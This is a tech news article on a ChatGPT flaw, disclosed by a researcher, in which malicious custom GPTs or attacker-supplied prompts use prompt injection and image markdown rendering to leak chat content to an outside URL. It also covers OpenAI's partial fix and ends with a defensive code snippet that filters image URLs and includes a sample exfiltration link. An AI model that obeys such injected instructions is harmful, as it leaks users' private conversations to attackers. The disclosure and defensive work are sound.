OpenAI says it has fixed a potentially serious ChatGPT flaw - but there could still be problems


A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.

When Johann Rehberger attempted to alert OpenAI to the potential flaw, he received no response, forcing the researcher to disclose details of the flaw publicly.

Following the disclosure, OpenAI released safety checks for ChatGPT that mitigate the flaw, but not completely.

 A hasty patch

The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, alongside metadata and technical data.

A secondary method involves the victim submitting a prompt supplied by the attacker, which then uses image markdown rendering and prompt injection to exfiltrate the data.

Rehberger initially reported the flaw to OpenAI way back in April 2023, supplying more details on how it can be used in more devious ways through November.

Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."

Rather than further pursuing an apparently unresponsive OpenAI, Rehberger decided to go public with his discovery, releasing a video demonstration of how his entire conversation with a chatbot designed to play tic-tac-toe was extracted to a third-party URL.

To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix stating, “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”

Unfortunately, these new checks do not fully mitigate the flaw, as Rehberger discovered that arbitrary domains are still sometimes rendered by ChatGPT, but a successful return is hit and miss. While these checks have apparently been implemented on the desktop versions of ChatGPT, the flaw remains viable on the iOS mobile app.
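The kind of pre-render check Rehberger describes can be sketched as a client-side filter over model output. This is an added example, not OpenAI's code or its validation API; the allowlisted host, the function names and the sample text are assumptions constructed for illustration.

```javascript
// Added illustration: hypothetical allowlist, not OpenAI's validation API.
const ALLOWED_IMAGE_HOSTS = new Set(["images.example.com"]); // assumed host

// Inline markdown image: ![alt](url "optional title")
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;

// Decide whether an image URL may be fetched by the chat client.
function isAllowedImageUrl(raw) {
  let url;
  try {
    url = new URL(raw); // throws on relative or malformed URLs
  } catch {
    return false;
  }
  if (url.protocol !== "https:") return false;
  if (url.username || url.password) return false; // no userinfo tricks
  // Exact host match: "images.example.com.other.invalid" must not pass.
  return ALLOWED_IMAGE_HOSTS.has(url.hostname);
}

// Replace non-allowlisted images with inert text before rendering, so the
// client never issues a request whose URL could carry chat content.
function sanitizeModelOutput(markdown) {
  const blocked = [];
  const text = markdown.replace(MD_IMAGE, (match, alt, url) => {
    if (isAllowedImageUrl(url)) return match;
    blocked.push(url); // keep for logging / detection
    return `[image blocked: ${alt || "untitled"}]`;
  });
  return { text, blocked };
}

// Constructed sample of model output (not captured from a real session).
const SAMPLE = [
  "Your move! ![board](https://images.example.com/board.png)",
  "![x](https://collector.invalid/log?q=CHAT_SUMMARY)",
].join("\n");

const result = sanitizeModelOutput(SAMPLE);
console.log(result.text);
console.log("blocked:", result.blocked);
```

Reference-style images and raw HTML `<img>` tags need the same check, since any of them triggers a fetch when rendered.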

Via BleepingComputer


Benedict Collins is a Staff Writer at TechRadar Pro covering privacy and security. Before settling into journalism Ben worked as a Livestream Production Manager, covering games in the National Ice Hockey League for 5 years and contributing heavily to the advancement of livestreaming within the league.
